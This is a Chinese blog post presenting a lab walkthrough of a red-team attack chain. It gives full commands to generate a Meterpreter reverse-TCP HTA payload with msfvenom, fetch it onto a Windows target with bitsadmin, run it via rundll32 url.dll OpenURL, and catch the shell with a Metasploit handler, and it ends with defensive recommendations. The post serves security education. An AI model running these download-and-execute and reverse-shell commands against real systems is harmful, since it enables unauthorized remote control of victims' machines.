基于HTA和BITSAdmin的模拟渗透攻击实验

原创 于 2025-08-29 07:18:51 发布 · 562 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #CTF

基于HTA和BITSAdmin的模拟渗透攻击实验

一、 实验概述

本实验旨在模拟一个常见的攻击者(红队)渗透流程。攻击者利用Metasploit框架生成一个恶意的HTA(HTML Application)文件,通过Windows系统自带的BITSAdmin工具将其传输到靶机,并最终通过执行该文件在靶机上获得一个Meterpreter反向Shell会话,从而实现对靶机的远程控制。

实验环境:

  • 攻击机 (Attacker): Kali Linux 2023 (IP: 192.168.1.26)
  • 靶机 (Target): Windows 10/11 (需能访问 http://192.168.1.26)
  • 工具: Metasploit Framework, BITSAdmin, PowerShell

实验原理:

  1. 载荷生成: 使用msfvenom生成一个包含Meterpreter反向TCP连接的恶意HTA文件。
  2. 载荷投递: 利用Windows合法工具BITSAdmin(后台智能传输服务)从攻击机搭建的Web服务器下载恶意文件到靶机,这是一种“Living off the Land”技术,可以规避一些安全软件的检测。
  3. 载荷执行: 在靶机上执行HTA文件,HTA文件中的PowerShell脚本会启动,并主动连接到攻击机监听的端口。
  4. 会话建立: 攻击机上的Metasploit监听器接收到来自靶机的连接,建立Meterpreter会话,从而获得对靶机的控制权。
二、 实验步骤
步骤 1:生成恶意HTA载荷

在Kali Linux攻击机上打开终端,执行以下命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT=7777 -f hta-psh > attack.hta
  • 命令解释:
    • -p windows/x64/meterpreter/reverse_tcp: 指定使用的Payload为64位Windows系统的Meterpreter反向TCP连接。
    • LHOST=192.168.1.26: 指定回连的攻击机IP地址。
    • LPORT=7777: 指定回连的攻击机端口。
    • -f hta-psh: 指定输出格式为HTA,其中嵌入PowerShell命令。
    • > attack.hta: 将生成的载荷保存到当前目录下的attack.hta文件中。

截屏2025-08-28 18.39.08

步骤 2:启动Web服务

HTA文件需要通过网络被靶机下载。在Kali上,将生成的attack.hta文件放到Web服务器根目录。最简单的方法是使用Python内置的HTTP服务器。将attack.hta文件拷贝到/var/www/html目录下:

attack.hta文件所在目录下执行:

#systemctl start apache2

此命令会在攻击机的80端口启动一个临时的Web服务器。

在Windows系统的powershell(管理员模式)下,运行如下命令:

bitsadmin /transfer shell http://192.168.1.26/attack.hta c:\windows\temp\attack.hta

1

步骤 3:配置Metasploit监听器

打开Kali Linux上的新终端,启动Metasploit并设置监听器,等待靶机反弹回来的连接。

msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.26
set LPORT 7777
exploit -j
  • 命令解释:
    • msfconsole -q: 以安静模式启动MSF控制台(减少启动横幅)。
    • use exploit/multi/handler: 使用通用监听器 exploit模块。
    • set payload windows/x64/meterpreter/reverse_tcp: 设置Payload,必须与生成载荷时使用的Payload一致。
    • set LHOSTset LPORT: 设置监听的主机和端口,与生成载荷时的值一致。
    • exploit -j: 作为后台任务(Job)运行监听器,这样即使退出当前模块,监听仍在继续。

截屏2025-08-28 18.54.29

步骤 4:投递并执行载荷(在靶机操作)

模拟攻击者通过某种方式(如钓鱼邮件、漏洞利用等)诱使靶机用户执行以下命令。

  1. 使用BITSAdmin下载恶意文件:
    在靶机上以管理员身份打开PowerShellCMD,执行以下命令:

    bitsadmin /transfer shell http://192.168.1.26/attack.hta C:\Windows\Temp\attack.hta
    • 命令解释: 使用系统合法工具bitsadmin创建一个名为shell的下载任务,从攻击机的Web服务器下载attack.hta文件,并保存到靶机的C:\Windows\Temp\目录下。

    1

  2. 执行HTA文件:
    下载完成后,在同一个(管理员)PowerShell窗口中,执行以下命令:

    rundll32.exe url.dll, OpenURL C:\Windows\Temp\attack.hta
    • 命令解释: 使用rundll32调用url.dll库中的OpenURL函数来执行位于临时目录的HTA文件。这是一种常见的绕过执行限制的技巧。
步骤 5:获取反弹Shell

当靶机上的attack.hta文件被成功执行后,其内部的PowerShell脚本会启动,并主动向攻击机192.168.1.26:7777发起TCP连接。

此时,在Kali Linux的Metasploit控制台界面,你会看到类似以下的提示:

[*] Started reverse TCP handler on 192.168.1.26:7777
[*] Sending stage (203846 bytes) to 192.168.1.13
[*] Meterpreter session 1 opened (192.168.1.26:7777 -> 192.168.1.13:52775) at 2025-xx-xx xx:xx:xx +0000

这表示一个Meterpreter会话已经成功建立。你可以使用sessions命令查看所有会话,并使用sessions -i 1来交互式地控制这个编号为1的会话。

截屏2025-08-28 19.13.39

三、 实验总结与防御建议

实验总结:
本实验成功模拟了从生成恶意载荷、投递到最终获取Shell的完整攻击链。攻击者利用了系统合法工具(BITSAdmin、rundll32)和脚本技术(HTA/PowerShell),有效地绕过了部分安全软件的静态检测,凸显了“无文件攻击”和“Living off the Land”技术的威胁。

防御建议:

  1. 用户教育: 不要以管理员身份运行未知脚本或命令。对于来源不明的指令应保持高度警惕。
  2. 网络层防护: 部署防火墙,限制不必要的出站连接。在上述实验中,如果靶机无法向外发起对任意IP 7777端口的连接,攻击将失效。
  3. 终端防护: 启用并配置高级别的EDR(终端检测与响应)产品或杀毒软件,它们能够基于行为检测此类恶意活动(如PowerShell的异常网络连接)。
  4. 应用限制: 通过组策略等方法限制或监控BITSAdmin、PowerShell、rundll32等高风险工具的使用。
  5. 最小权限原则: 日常使用计算机时,不要使用管理员账户,使用标准用户账户可以大幅降低此类攻击的成功率。

免责声明:本文仅用于教育目的和安全研究,旨在帮助提升网络安全防御能力。请勿将文中所述技术用于任何非法目的。所有测试应在自己拥有合法授权的设备或实验环境中进行。

脱库&站库分离渗透&解决MySQL禁止外连
lza20001103的博客
01-24 723
脱库&站库分离渗透&解决MySQL禁止外连
网站漏洞安全渗透测试公司组建方案
网站安全专家
12-05 906
越来越多的网站app的上线,导致安全问题日益增加,漏洞问题也非常多,大公司急需组建专业的渗透测试团队来保障新项目的安全稳定,防止被入侵被黑,对此我们Sinesafe给大家讲解下组建安全团队的重要几点,来达到各个项目的安全渗透工作的分工执行能力。 渗透测试安全团队建设 红蓝军简介 在队伍的对抗演习中,蓝军通常是指在部队模拟对抗演习专门扮演假想敌的部队,与红军(代表我方正面部队)进行针对性...
网站安全渗透测试团队公司解决防护方案
网站安全资讯
12-05 470
越来越多的网站app的上线,导致安全问题日益增加,漏洞问题也非常多,大公司急需组建专业的渗透测试团队来保障新项目的安全稳定,防止被入侵被黑,对此我们Sinesafe给大家讲解下组建安全团队的重要几点,来达到各个项目的安全渗透工作的分工执行能力。 渗透测试安全团队建设 红蓝军简介 在...
end的学习站库分离渗透思路
qq_45781155的博客
11-17 2307
0X00 站库分离 站库分离其实就是管理员将网站程序数据库分别放在了不同的内网服务器上。 0X01站库分离渗透入口 (1) Web入口渗透 通过网站的各种漏洞来Getshell,如:文件上传、文件包含、命令执行、代码执行、SQL注入写入一句话(Into outfile、日志备份)等,在获得Webshell权限或者有诸如文件读取等漏洞时,我们可以读数据库配置文件、对数据库内容分析、查找数据库备份,进而对内网数据库服务器进行渗透。 (2) Data入口渗透 从数据库入口渗透同样是为了获取更大的权限,或者扩展我
如何设计逼真的网络靶场实战演练(CFS)攻击链?
深山技术宅的博客
07-03 731
如何设计逼真的网络靶场实战演练(CFS)攻击链?
[论文阅读] (21)S&P21 Survivalism: Systematic Analysis of Windows Malware Living-Off-The-Land (经典离地攻击)
杨秀璋的专栏
05-04 5114
《娜璋带你读论文》系列主要是督促自己阅读优秀论文及听取学术讲座,并分享给大家,希望您喜欢。前一篇从个人角度介绍USENIXSec21恶意代码分析的经典论文,DeepReflect,它通过二进制重构发现恶意功能。这篇文章将带来S&P21的离地攻击(Living-Off-The-Land)系统分析,这是一篇非常经典的论文,并且系统性分析文章是另一种讲故事的方法。希望这篇文章对您有所帮助,这些大佬是真的值得我们去学习,献上小弟的膝盖~fighting!
命令执行漏洞利用技巧总结
st3pby的博客
05-19 3171
在红蓝对抗中,远程命令执行类漏洞往往是攻击方在正面路径中突破边界非常青睐的。常见的可以执行远程命令的漏洞的有各种JAVA反序列化漏洞、远程代码执行漏洞、远程命令执行漏洞(原生)、表达式执行漏洞、SQL注入漏洞等。远程命令执行类漏洞从漏洞探测到漏洞利用其实都非常讲究技巧。如果在进行漏洞探测阶段考虑的情况不全就会很容易遗漏漏洞,与漏洞擦肩而过;在漏洞利用阶段如果知识面不广(姿势不够多)的话可能就会陷入苦苦挣扎却无法获取权限的困境。目标操作系统类型、执行命令结果是否有回显以及是否能通外网。
数据库脱裤
ALe0721的博客
04-16 972
假设你已经getshell网站要连接mysql,就需要把mysql的账号密码保存在一个php文件中,类似config.php、common.inc.php等,在shell中,读取这些文件,找到其中信息即可ps:有时候数据库这样写:xxxx@localhost,有时候这样写:xxxx@%,当是“%”的时候,说明任意地址都能对数据库操作,于是我们在外部就能连接别人的数据库,这时候使用外部工具比较方便补充:mysql端口默认:3306,mssql默认端口:1433 , oracle默认端口:1521。
利用 HTA 文件进行渗透测试实验
Liu_Bruce的博客
12-14 792
HTA(HTML Application)文件是一种可以在 Windows 上执行的 HTML 应用程序。由于其特性,攻击者可以利用 HTA 文件来执行恶意代码。本指南将结合 Metasploit 框架,展示如何利用 HTA 文件进行渗透测试。
WannaCry_HTA 是一个基于 HTA(HTML Application)技术开发的高度仿真 WannaCry 勒
08-25
WannaCry_HTA 是一个基于 HTA(HTML Application)技术开发的高度仿真 WannaCry 勒索病毒界面模拟程序。该项目简单、完全可控,专为安全研究、应急演练安全教育场景设计。界面UI参考zR00t1师傅项目编写。.zip
HTA版JSMin(省略修饰语若干)基于javascript语言编写
10-29
JSMin是一种很有用的ECMAScript代码减肥工具,虽然它只是一种较为初级的工具,但用它来对付我自己编写的大部分ECMAScript代码效果都很不错,而且在我这里也从未发生过减肥后代码出错之类的问题。
谷歌官宣组建“网络攻击部门”,美国网络安全战略转向“以攻代防”
FreeBuf_的博客
08-28 418
8月27日,谷歌宣布将组建网络攻击部门。
深入理解 Python Scapy 库:网络安全与协议分析的瑞士军刀
萧鼎的博客
08-25 804
在网络安全、协议分析渗透测试领域,有一个几乎无人不知的 Python 工具库 —— **Scapy**。它不仅是一个网络数据包的构造与解析工具,更是一个跨越开发、测试、调试、安全审计等场景的“瑞士军刀”。与传统的 Wireshark、tcpdump 等被动分析工具不同,Scapy 允许我们 **主动构造数据包、发送、捕获、修改、解析分析**,并且可以灵活扩展,支持从二层到七层的多种协议。
网络安全测试(一)Kali Linux
测试人的成长日志
08-28 250
Burp Suite:Web 应用安全测试工具,集成代理、扫描器、 Intruder(爆破工具)等,用于发现 Web 漏洞(如 SQL 注入、XSS)。Metasploit Framework:渗透测试框架,包含大量漏洞利用模块、Payload 攻击脚本,支持从漏洞利用到权限维持的全流程。Hashcat:高性能密码哈希破解工具,支持 GPU 加速,可破解多种哈希算法(如 MD5、SHA-256)。Maltego:通过可视化关联分析,收集目标的域名、IP、社交媒体等信息,构建信息图谱。
工业网络安全:保护制造系统数据
网络研究观
08-28 1274
工业控制系统指南之类的成熟框架提供了构建有效且可审计的防御措施的结构化方法。
Web安全开发指导规范文档V1.0
魔都虫师的博客
08-26 71
Web安全开发指导文档V1.0
【第三方网站运行环境测试:服务器配置(如Nginx/Apache)的WEB安全测试重点】
最新发布
2503_92839163的博客
08-28 292
第三方网站运行环境测试:服务器配置(如Nginx/Apache)的WEB安全测试重点服务器配置安全测试是WEB安全评估的关键,一般关注信息泄露、传输安全、访问控制及资源防护等方面。
网络安全初级第一次作业
2301_80811863的博客
08-24 1202
nginx可以进行静态文件的处理(html、css、js、图片)、不能直接返回php文件给前端中间件:应用服务器中间件信息收集(子域名、真实ip、注册人相关信息、备案号……)www.baidu.com aaa.baidu.com漏洞检测漏洞验证提取所需信息分析信息整理渗透测试报告生成信息收集域名收集子域名收集。
.HTA程序模拟键盘的代码
03-30
### HTA 程序模拟键盘输入 以下是通过 HTA (HTML Application) 使用 JavaScript 或 VBScript 来实现模拟键盘输入的示例代码: #### 方法一:使用 WScript.Shell 的 SendKeys 函数 可以利用 `WScript.Shell` 对象中的 `SendKeys` 方法来发送按键命令。 ```javascript <hta:application id="oHTA" applicationname="SimulateKeyboardInput"> <html> <head> <script language="VBScript"> Sub Window_OnLoad() Dim objShell Set objShell = CreateObject("WScript.Shell") ' 模拟按下 Ctrl+C 组合键 objShell.SendKeys "^c" ' 延迟一段时间再继续执行其他操作 WScript.Sleep 1000 ' 模拟按下 Enter 键 objShell.SendKeys "~" MsgBox "键盘输入已成功模拟!", vbInformation, "完成" End Sub </script> </head> <body> <h1>HTA 应用程序 - 模拟键盘输入</h1> <p>此应用程序将在加载时自动运行并模拟键盘输入。</p> </body> </html> ``` 上述代码展示了如何创建一个简单的 HTA 文件,当其启动时会调用 `Window_OnLoad()` 函数,并通过 `objShell.SendKeys` 发送特定的按键组合[^4]。 --- #### 方法二:使用 JavaScript 实现更复杂的键盘事件触发 对于某些高级场景下可能需要手动触发 DOM 中的键盘事件。下面是一个基于 HTML JavaScript 的例子: ```html <hta:application id="oHTA" applicationname="AdvancedKeyboardSimulation"> <html> <head> <script type="text/javascript"> function simulateKeyPress(character) { var evt = document.createEvent('KeyboardEvent'); evt.initKeyEvent( "keypress", true, true, window, false, false, false, false, character.charCodeAt(0), character.charCodeAt(0) ); var canceled = !document.body.dispatchEvent(evt); } window.onload = function() { setTimeout(function(){ simulateKeyPress('a'); // 模拟按下一个字母'a' alert("已经模拟了一个字符'A'!"); }, 1000); // 设置延迟时间以便观察效果 }; </script> </head> <body> <h1>HTA 应用程序 - 高级键盘事件模拟</h1> <p>该应用会在页面加载后一秒内模拟一次键盘输入。</p> </body> </html> ``` 这种方法允许更加精细地控制所要仿真的具体行为,比如指定不同的修饰符状态或者调整重复率等参数[^5]。 --- ### 注意事项 - 上述方法适用于 Windows 平台上的 HTA 应用开发环境。 - 如果计划将此类技术应用于安全研究之外的实际环境中,请务必遵循当地法律法规以及道德准则,避免非法入侵他人计算机系统的行为发生[^6]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bruce_xiaowei

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值